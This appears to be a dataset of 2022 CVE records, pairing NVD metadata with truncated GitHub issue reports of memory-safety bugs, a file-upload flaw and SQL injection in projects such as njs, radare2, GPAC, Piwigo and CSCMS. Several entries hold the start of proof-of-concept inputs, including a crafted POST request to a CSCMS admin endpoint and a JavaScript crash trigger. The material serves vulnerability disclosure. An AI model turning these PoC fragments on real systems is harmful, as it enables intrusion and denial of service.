"versionSt... | https://github.com/michaelrsweet/htmldoc/issues/471 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"michaelrsweet",
"htmldoc"
] | Hi, there is two integer overflow bugs in the latest version of htmldoc.
They are similar to [CVE-2021-20308](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20308).
os: ubuntu 20.04
version: 1.9.16(the latest)
### First
First, in image_load_jpeg function, image.cxx.
When it calls malloc,'img->width' ... | Two Integer Overflow bugs in image.cxx | https://api.github.com/repos/michaelrsweet/htmldoc/issues/471/comments | 5 | 2022-03-10T05:57:25Z | 2022-05-22T09:06:54Z | https://github.com/michaelrsweet/htmldoc/issues/471 | 1,164,787,186 | 471 |
CVE-2020-19228 | 2022-05-11T12:15:07.863 | An issue was found in bludit v3.13.0, unsafe implementation of the backup plugin allows attackers to upload arbitrary files. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9,
"confidentialityImpact": "COMPLETE... | [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://bludit.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/bludit/bludit/issues/1242"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bludit:bludit:3.13.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2E7F9779-D5BF-41A2-82AC-6430E91D2B7B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/bludit/bludit/issues/1242 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"bludit",
"bludit"
] | Bludit v3.13.0 has a file upload vulnerability in 'backup' plugin . It requires administrator privileges .
1 open http://10.150.10.170/admin/plugins
Activate 'backup' plugin and click the Settings

2 ... | File upload vulnerability | https://api.github.com/repos/bludit/bludit/issues/1242/comments | 9 | 2020-07-24T09:06:36Z | 2022-02-22T16:11:27Z | https://github.com/bludit/bludit/issues/1242 | 665,032,423 | 1,242 |
CVE-2022-29977 | 2022-05-11T14:15:08.157 | There is an assertion failure error in stbi__jpeg_huff_decode, stb_image.h:1894 in libsixel img2sixel 1.8.6. Remote attackers could leverage this vulnerability to cause a denial-of-service via a crafted JPEG file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/saitoha/libsixel/issues/165"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.6:*:*:*:*:*:*:*",
"matchCriteriaId": "D78CB59C-7966-46E3-A325-A7508F0ED51D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | https://github.com/saitoha/libsixel/issues/165 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"saitoha",
"libsixel"
] | ## Description ##
There is an assertion failure error in stbi__jpeg_huff_decode, stb_image.h:1894. Remote attackers could leverage this vulnerability to cause a denial-of-service via a crafted jpg file.
## Version ##
img2sixel 1.8.6, commit id 6a5be8b72d84037b83a5ea838e17bcf372ab1d5f (Tue Jan 14 02:27:00 2020 +090... | Assertion failure in stbi__jpeg_huff_decode, stb_image.h:1894 | https://api.github.com/repos/saitoha/libsixel/issues/165/comments | 3 | 2022-04-23T16:47:52Z | 2022-05-17T08:42:26Z | https://github.com/saitoha/libsixel/issues/165 | 1,213,359,590 | 165 |
CVE-2022-29978 | 2022-05-11T14:15:08.197 | There is a floating point exception error in sixel_encoder_do_resize, encoder.c:633 in libsixel img2sixel 1.8.6. Remote attackers could leverage this vulnerability to cause a denial-of-service via a crafted JPEG file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/saitoha/libsixel/issues/166"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libsixel_project:libsixel:1.8.6:*:*:*:*:*:*:*",
"matchCriteriaId": "D78CB59C-7966-46E3-A325-A7508F0ED51D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | https://github.com/saitoha/libsixel/issues/166 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"saitoha",
"libsixel"
] | ## Description ##
There is a floating point exception error in sixel_encoder_do_resize, encoder.c:633 in img2sixel 1.8.6. Remote attackers could leverage this vulnerability to cause a denial-of-service via a crafted JPEG file.
## Version ##
img2sixel 1.8.6, commit id https://github.com/saitoha/libsixel/commit/... | FPE in sixel_encoder_do_resize, encoder.c:633 | https://api.github.com/repos/saitoha/libsixel/issues/166/comments | 4 | 2022-04-25T06:12:49Z | 2022-05-17T08:43:20Z | https://github.com/saitoha/libsixel/issues/166 | 1,214,020,987 | 166 |
CVE-2021-42863 | 2022-05-12T13:15:07.687 | A buffer overflow in ecma_builtin_typedarray_prototype_filter() in JerryScript version fe3a5c0 allows an attacker to construct a fake object or a fake arraybuffer with unlimited size. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4793"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*",
"matchCriteriaId": "243328D8-E703-4355-9970-BB352D6E99B1",
"versionEndExcluding": "2021-10-15",
"versionEndIncluding": null,
"versio... | https://github.com/jerryscript-project/jerryscript/issues/4793 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
d4231e7
###### Build platform
Ubuntu 20.04.3 LTS (Linux 5.11.0-34-generic x86_64)
###### Build steps
```sh
./tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \
--clean --debug --strip=off --logging=on --error-messages=on \
--compile-flag=-fsanitize=address --sta... | Buffer-overflow in ecma-builtin-typedarray-prototype.c | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4793/comments | 0 | 2021-10-13T02:35:23Z | 2022-12-31T04:40:51Z | https://github.com/jerryscript-project/jerryscript/issues/4793 | 1,024,703,352 | 4,793 |
CVE-2022-29368 | 2022-05-12T19:15:49.493 | Moddable commit before 135aa9a4a6a9b49b60aa730ebc3bcc6247d75c45 was discovered to contain an out-of-bounds read via the function fxUint8Getter at /moddable/xs/sources/xsDataView.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/commit/135aa9a4a6a9b49b60aa730ebc3bcc6247d75c45"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:moddable:moddable:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4095912D-3ADA-4DF1-9254-03818D03B9C2",
"versionEndExcluding": null,
"versionEndIncluding": "os220330",
"versionStartEx... | https://github.com/Moddable-OpenSource/moddable/issues/896 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Moddable-OpenSource",
"moddable"
] | ### Environment
**Build environment:** Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
**Target device:** sdk
**Commit:** e26597b9bf71e4d79f01cb329bd04f1562d32ddc
### Proof of concept
poc.js
```
function main() {
var a4 = [1111111111,11... | Out-of-bounds Read in fxUint8Getter | https://api.github.com/repos/Moddable-OpenSource/moddable/issues/896/comments | 3 | 2022-04-08T06:18:36Z | 2022-04-15T18:48:45Z | https://github.com/Moddable-OpenSource/moddable/issues/896 | 1,196,877,726 | 896 |
CVE-2022-29369 | 2022-05-12T19:15:49.533 | Nginx NJS v0.7.2 was discovered to contain a segmentation violation via njs_lvlhsh_bucket_find at njs_lvlhsh.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/commit/222d6fdcf0c6485ec8e175f3a7b70d650c234b4e"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/nginx/n... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.2:*:*:*:*:*:*:*",
"matchCriteriaId": "C1858598-78C6-451F-81B4-57F6D636EBAC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": nul... | https://github.com/nginx/njs/issues/467 | [
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | ### Environment
```
OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : 7bd570b39297d3d91902c93a624c89b08be7a6fe
Version : 0.7.2
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -... | SEGV njs_lvlhsh.c:231:17 in njs_lvlhsh_bucket_find | https://api.github.com/repos/nginx/njs/issues/467/comments | 0 | 2022-02-15T08:25:51Z | 2022-04-05T03:03:07Z | https://github.com/nginx/njs/issues/467 | 1,138,345,452 | 467 |
CVE-2022-29017 | 2022-05-16T14:15:07.863 | Bento4 v1.6.0.0 was discovered to contain a segmentation fault via the component /x86_64/multiarch/strlen-avx2.S. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/691"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.6.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "23A9C6DA-83D1-4248-B977-29C56C791132",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | https://github.com/axiomatic-systems/Bento4/issues/691 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | SUMMARY: AddressSanitizer: SEGV /build/glibc-sMfBJT/glibc-2.31/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:65
- Version
```
➜ mp42hls_test git:(master) ✗ ./mp42hls
MP4 To HLS File Converter - Version 1.2
(Bento4 Version 1.6.0.0)
(c) 2002-2018 Axiomatic Systems, LLC
```
branch 4d8e1fc
- Platform
... | AddressSanitizer: SEGV /build/glibc-sMfBJT/glibc-2.31/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:65 | https://api.github.com/repos/axiomatic-systems/Bento4/issues/691/comments | 1 | 2022-04-10T14:50:23Z | 2022-05-17T06:24:00Z | https://github.com/axiomatic-systems/Bento4/issues/691 | 1,199,061,348 | 691 |
CVE-2022-30976 | 2022-05-18T11:15:15.460 | GPAC 2.0.0 misuses a certain Unicode utf8_wcslen (renamed gf_utf8_wcslen) function in utils/utf.c, resulting in a heap-based buffer over-read, as demonstrated by MP4Box. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4,
"confidentialityImpact": "PARTIAL"... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/blob/105d67985ff3c3f4b98a98f312e3d84ae77a4463/share/doc/man/gpac.1#L2226-L2229"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D7AEE044-50E9-4230-B492-A5FF18653115",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | https://github.com/gpac/gpac/issues/2179 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [x] I looked for a similar issue and couldn't find any.
- [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [x] I give enough info... | [BUG] heap buffer overflow in gf_utf8_wcslen, utils/utf.c:442 | https://api.github.com/repos/gpac/gpac/issues/2179/comments | 4 | 2022-04-25T14:26:20Z | 2023-03-07T12:37:47Z | https://github.com/gpac/gpac/issues/2179 | 1,214,594,854 | 2,179 |
CVE-2021-42585 | 2022-05-23T11:16:10.547 | A heap buffer overflow was discovered in copy_compressed_bytes in decode_r2007.c in dwgread before 0.12.4 via a crafted dwg file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/351"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*",
"matchCriteriaId": "030087DE-C04A-4AA0-864A-FD276745EB75",
"versionEndExcluding": "0.12.4",
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/LibreDWG/libredwg/issues/351 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | ## Affected version
[the latest commit](https://github.com/LibreDWG/libredwg/commit/4c210bbae04957b7d4aba55aee8dca42337f8d47) and 0.12.4
## What's the problem?
A heap buffer overflow was discovered in copy_compressed_bytes in decode_r2007.c:332.
ASAN report:
```
./dwgread ./tests_64205
ERROR: Sectio... | Heap-buffer-overflow in copy_compressed_bytes in decode_r2007.c:332 | https://api.github.com/repos/LibreDWG/libredwg/issues/351/comments | 1 | 2021-06-07T07:50:57Z | 2021-06-07T19:17:53Z | https://github.com/LibreDWG/libredwg/issues/351 | 913,238,141 | 351 |
CVE-2021-42586 | 2022-05-23T11:16:10.600 | A heap buffer overflow was discovered in copy_bytes in decode_r2007.c in dwgread before 0.12.4 via a crafted dwg file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/350"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*",
"matchCriteriaId": "030087DE-C04A-4AA0-864A-FD276745EB75",
"versionEndExcluding": "0.12.4",
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/LibreDWG/libredwg/issues/350 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | ## Affected version
[the latest commit](https://github.com/LibreDWG/libredwg/commit/4c210bbae04957b7d4aba55aee8dca42337f8d47) and 0.12.4
## What's the problem?
A heap buffer overflow was discovered in copy_bytes in decode_r2007.c:228.
ASAN report:
```
./dwgread ./tests_64199
========================... | Heap-buffer-overflow in copy_bytes in decode_r2007.c:228 | https://api.github.com/repos/LibreDWG/libredwg/issues/350/comments | 1 | 2021-06-07T07:46:30Z | 2021-06-07T18:57:04Z | https://github.com/LibreDWG/libredwg/issues/350 | 913,233,568 | 350 |
CVE-2021-44975 | 2022-05-24T15:15:07.507 | radareorg radare2 5.5.2 is vulnerable to Buffer Overflow via /libr/core/anal_objc.c mach-o parser. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2022/05/25/1"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://census-labs.com... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:radare:radare2:5.5.2:*:*:*:*:*:*:*",
"matchCriteriaId": "1D488ADA-AA17-4EFD-A47C-D809EB9B7982",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/radareorg/radare2/issues/19476 | [
"Exploit",
"Issue Tracking",
"Patch",
"Tool Signature"
] | github.com | [
"radareorg",
"radare2"
] | # Heap Buffer overflows in objc_build_refs
I have discovered two heap buffer
overflows while parsing mach-o executables.
Please refer bellow for further information.
## Environment
```sh
shad3@ubuntu:~/Desktop/$ uname -ms
Linux x86_64
shad3@ubuntu:~/Desktop/$ r2 -v
radare2 5.5.2 27243 @ linux-x86... | Heap buffer overflows in function objc_build_refs while parsing mach-o files. | https://api.github.com/repos/radareorg/radare2/issues/19476/comments | 2 | 2021-12-07T21:05:25Z | 2022-05-24T13:41:14Z | https://github.com/radareorg/radare2/issues/19476 | 1,073,754,519 | 19,476 |
CVE-2021-44974 | 2022-05-25T12:15:07.997 | radareorg radare2 version 5.5.2 is vulnerable to NULL Pointer Dereference via libr/bin/p/bin_symbols.c binary symbol parser. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2022/05/25/1"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https:... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "28076B4E-2508-49E1-8807-9507B43F8A1E",
"versionEndExcluding": "5.5.4",
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/radareorg/radare2/issues/19478 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"radareorg",
"radare2"
] | # NULL pointer dereference in ``symbols()``
I have discovered a NULL / Invalid pointer dereference
bug, that gets triggered while parsing the symbols of a binary.
## Environment
```
shad3@ubuntu:~/Desktop/$ uname -ms
Linux x86_64
shad3@ubuntu:~/Desktop/$ r2 -v
radare2 5.5.2 27243 @ linux-x86-64 git.5.5.0
... | NULL pointer dereference in ``symbols()`` | https://api.github.com/repos/radareorg/radare2/issues/19478/comments | 1 | 2021-12-07T22:50:34Z | 2022-05-24T13:43:06Z | https://github.com/radareorg/radare2/issues/19478 | 1,073,817,017 | 19,478 |
CVE-2022-29379 | 2022-05-25T13:15:07.837 | Nginx NJS v0.7.3 was discovered to contain a stack overflow in the function njs_default_module_loader at /src/njs/src/njs_module.c. NOTE: multiple third parties dispute this report, e.g., the behavior is only found in unreleased development code that was not part of the 0.7.2, 0.7.3, or 0.7.4 release | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/commit/ab1702c7af9959366a5ddc4a75b4357d4e9ebdc1"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "ht... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "EDE9A3C3-1CA9-439E-ADC1-6B7411DC4324",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": nul... | https://github.com/nginx/njs/issues/491 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | Hey there!
I belong to an open source security research community, and a member (@salmonx) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a `SECURITY.md` file with an email, or another contact method? GitHub [recommends](https://docs.github.com/en/code-security... | Found a possible security concern | https://api.github.com/repos/nginx/njs/issues/491/comments | 2 | 2022-04-08T08:53:47Z | 2022-04-13T04:39:29Z | https://github.com/nginx/njs/issues/491 | 1,197,033,233 | 491 |
CVE-2022-29379 | 2022-05-25T13:15:07.837 | Nginx NJS v0.7.3 was discovered to contain a stack overflow in the function njs_default_module_loader at /src/njs/src/njs_module.c. NOTE: multiple third parties dispute this report, e.g., the behavior is only found in unreleased development code that was not part of the 0.7.2, 0.7.3, or 0.7.4 release | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/commit/ab1702c7af9959366a5ddc4a75b4357d4e9ebdc1"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "ht... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "EDE9A3C3-1CA9-439E-ADC1-6B7411DC4324",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": nul... | https://github.com/nginx/njs/issues/493 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | # Description
njs 0.7.3, used in NGINX, was discovered to contain a stack-buffer-overflow in njs_default_module_loader
(/src/njs/src/njs_module.c)
# ENV
- Version : 0.7.3
- Commit : 222d6fdcf0c6485ec8e175f3a7b70d650c234b4e
- OS : Ubuntu 18.04
- Configure : CC=clang-14 ./configure --address-s... | [Fixed] njs 0.7.3 was discovered to contain a stack-buffer-overflow bug in njs_default_module_loader | https://api.github.com/repos/nginx/njs/issues/493/comments | 1 | 2022-04-13T01:20:16Z | 2022-04-13T03:46:55Z | https://github.com/nginx/njs/issues/493 | 1,202,634,880 | 493 |
CVE-2022-31620 | 2022-05-25T21:15:08.530 | In libjpeg before 1.64, BitStream<false>::Get in bitstream.hpp has an assertion failure that may cause denial of service. This is related to out-of-bounds array access during arithmetically coded lossless scan or arithmetically coded sequential scan. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/thorfdbg/libjpeg/commit/ef4a29a62ab48b8dc235f4af52cfd6319eda9a6a"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisor... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libjpeg_project:libjpeg:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4C0D08AF-7C1C-4EFD-8252-E8BE092C1827",
"versionEndExcluding": "1.64",
"versionEndIncluding": null,
"versionStart... | https://github.com/thorfdbg/libjpeg/issues/70 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"thorfdbg",
"libjpeg"
] | There is an assert failure in `BitStream<false>::Get` in `bitstream.hpp`. Depending on the usage of this library, e.g., running on remote server as a service, this could cause Deny of Service attack.
* reproduce steps:
1. unzip poc.zip
2. compile libjpeg with address sanitizer enabled
3. run `jpeg ./poc /dev/null... | Assert Failure in BitStream<false>::Get | https://api.github.com/repos/thorfdbg/libjpeg/issues/70/comments | 1 | 2022-05-19T03:28:48Z | 2022-05-23T06:01:03Z | https://github.com/thorfdbg/libjpeg/issues/70 | 1,241,136,016 | 70 |
CVE-2021-40317 | 2022-05-26T13:15:08.083 | Piwigo 11.5.0 is affected by a SQL injection vulnerability via admin.php and the id parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1470"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:11.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B6BC6DF8-D938-4413-B4C7-132BCC938E68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/Piwigo/Piwigo/issues/1470 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Piwigo",
"Piwigo"
] | The following is the detail about this vulnerability I found in Piwigo 11.5.0:
First, visit URL/admin.php and login, then click Album-Move. On this page, click ORDER on the right side.

Then we can see:
![... | [11.5.0]SQL Injection Vulnerability | https://api.github.com/repos/Piwigo/Piwigo/issues/1470/comments | 1 | 2021-08-29T13:49:36Z | 2022-09-28T13:26:54Z | https://github.com/Piwigo/Piwigo/issues/1470 | 982,104,453 | 1,470 |
CVE-2022-29660 | 2022-05-26T14:15:08.270 | CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the id parameter at /admin.php/pic/admin/pic/del. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/25#issue-1207649017"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms_music_portal_system:4.2:*:*:*:*:*:*:*",
"matchCriteriaId": "4A0D50C4-3CEE-493B-86F5-8F55E1000F68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | https://github.com/chshcms/cscms/issues/25#issue-1207649017 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | #### Details
There is a Injection vulnerability exists in pic_Pic.php_del
First create an image and then delete it. When deleting an image, SQL injection is generated. The injection point is ID
```
POST /admin.php/pic/admin/pic/del?yid=3 HTTP/1.1
Host: cscms.test
Content-Length: 21
Accept: application/json... | SQL injection vulnerability exists in Cscms music portal system v4.2 | https://api.github.com/repos/chshcms/cscms/issues/25/comments | 0 | 2022-04-19T02:48:07Z | 2022-04-19T02:48:07Z | https://github.com/chshcms/cscms/issues/25 | 1,207,649,017 | 25 |
